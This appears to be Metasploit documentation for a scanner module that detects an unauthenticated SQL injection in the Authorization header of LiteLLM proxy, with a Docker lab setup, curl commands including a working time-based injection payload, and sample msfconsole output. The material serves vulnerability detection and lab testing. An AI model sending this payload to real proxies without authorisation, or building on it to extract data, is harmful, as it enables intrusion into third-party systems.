documentation/modules/auxiliary/scanner/http/litellm_proxy_sqli.md
LiteLLM is an LLM gateway/proxy. Versions 1.81.16 through 1.83.6 are affected by CVE-2026-42208 (CVSS 9.3, on the CISA KEV list), an unauthenticated SQL injection.
During API-key verification, the proxy interpolates the raw Authorization
bearer value into a PostgreSQL query without parameterization:
WHERE v.token = '<bearer value>'
LiteLLM only SHA-256-hashes bearer tokens that begin with sk-. A bearer value
that does not start with sk- is passed to the query verbatim, so a single
quote breaks out of the string and injects. The lookup runs on the
authentication-failure path, which is reachable before authentication. Fixed
in 1.83.7 by switching to a parameterized query (commit 4dc416ee74).
This module confirms the flaw with a benign time-based check built on the
framework's PostgreSQL time-based blind SQL injection library
(Msf::Exploit::SQLi::PostgreSQLi::TimeBasedBlind). It issues one request whose
injected predicate calls pg_sleep only when a tautology is true and a second
request whose predicate never sleeps, and reports the target vulnerable only when
the first is delayed while the second returns promptly. A server that is merely
slow delays both requests and is not flagged. It never reads or exfiltrates data.
Detection requires the target to have provisioned at least one virtual key (see
Setup). The injectable predicate is a WHERE clause that PostgreSQL evaluates
only against matching rows, so the time-based signal cannot fire against an empty
token table. Any LiteLLM proxy in real use has issued keys, but a freshly
initialized proxy with no keys may not respond to the probe.
litellm_config.yaml:
model_list:
- model_name: gpt-3.5-turbo
litellm_params:
model: huggingface/huggingface-model
api_key: os.environ/FAKE_API_KEY
general_settings:
master_key: os.environ/LITELLM_MASTER_KEY
database_url: os.environ/DATABASE_URL
docker-compose.yaml (vulnerable — DB-backed mode is what creates the token table):
services:
db:
image: postgres:16
environment:
POSTGRES_DB: litellm
POSTGRES_USER: litellm
POSTGRES_PASSWORD: litellm123
healthcheck:
test: ["CMD-SHELL", "pg_isready -U litellm"]
interval: 5s
retries: 5
litellm:
image: litellm/litellm:main-v1.83.3-stable # vulnerable; use main-v1.83.7-stable for the patched run
command: ["--config", "/app/config.yaml", "--port", "4000"]
ports:
- "4000:4000"
volumes:
- ./litellm_config.yaml:/app/config.yaml:ro
depends_on:
db:
condition: service_healthy
environment:
DATABASE_URL: "postgresql://litellm:litellm123@db:5432/litellm"
LITELLM_MASTER_KEY: "sk-master-test-key-1234"
Start it and wait for the proxy to connect to PostgreSQL and apply its schema
(the litellm_proxy_extras migration must finish before the token table exists;
/health/liveliness is unauthenticated and returns 200 once the server listens):
docker compose up -d
until curl -sf -o /dev/null http://localhost:4000/health/liveliness; do sleep 2; done
Provision at least one virtual key. The injectable predicate is a WHERE
clause that PostgreSQL evaluates only against matching rows, so on a proxy whose
LiteLLM_VerificationToken table is empty the pg_sleep never executes and the
target appears (falsely) safe. Any proxy in real use has issued keys; for the lab,
create one with the master key:
curl -s -X POST http://localhost:4000/key/generate \
-H 'Authorization: Bearer sk-master-test-key-1234' \
-H 'Content-Type: application/json' -d '{}'
Demonstrate the delay (control vs pg_sleep(5)):
curl -s -o /dev/null -w 'control: %{time_total}s\n' -X POST http://localhost:4000/v1/chat/completions \
-H 'Content-Type: application/json' -H 'Authorization: Bearer AAAA-control' \
-d '{"model":"gpt-3.5-turbo","messages":[{"role":"user","content":"x"}],"max_tokens":1}'
curl -s -o /dev/null -w 'inject: %{time_total}s\n' --max-time 30 -X POST http://localhost:4000/v1/chat/completions \
-H 'Content-Type: application/json' \
-H "Authorization: Bearer ' OR (SELECT pg_sleep(5)) IS NULL --" \
-d '{"model":"gpt-3.5-turbo","messages":[{"role":"user","content":"x"}],"max_tokens":1}'
Vulnerable: control ~0.03s, inject ~5s. Re-run with the main-v1.83.7-stable
image for the patched (true-negative) case — both return fast.
msfconsoleuse auxiliary/scanner/http/litellm_proxy_sqliset RHOSTS <target>set RPORT 4000runpg_sleepThe LiteLLM chat completions endpoint that triggers key verification. Defaults to
/v1/chat/completions.
The model field placed in the request body. It need not be a real model — the
key lookup fails before model dispatch. Default gpt-3.5-turbo.
Advanced option from the framework SQL injection mixin: the number of seconds the
injected pg_sleep runs for the time-based check. A higher value is more robust
against network jitter at the cost of a slower scan. Default 5.0.
Captured against the Docker lab above (vulnerable main-v1.83.3-stable on 4000,
patched main-v1.83.7-stable on 4001), each with one provisioned virtual key.
msf6 > use auxiliary/scanner/http/litellm_proxy_sqli
msf6 auxiliary(scanner/http/litellm_proxy_sqli) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(scanner/http/litellm_proxy_sqli) > set RPORT 4000
RPORT => 4000
msf6 auxiliary(scanner/http/litellm_proxy_sqli) > run
[+] 127.0.0.1:4000 - The target is vulnerable. Time-based SQL injection via Authorization header confirmed (LiteLLM 1.83.3)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/litellm_proxy_sqli) > set RPORT 4001
RPORT => 4001
msf6 auxiliary(scanner/http/litellm_proxy_sqli) > run
[*] 127.0.0.1:4001 - The target is not exploitable. No time-based SQL injection signal observed
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed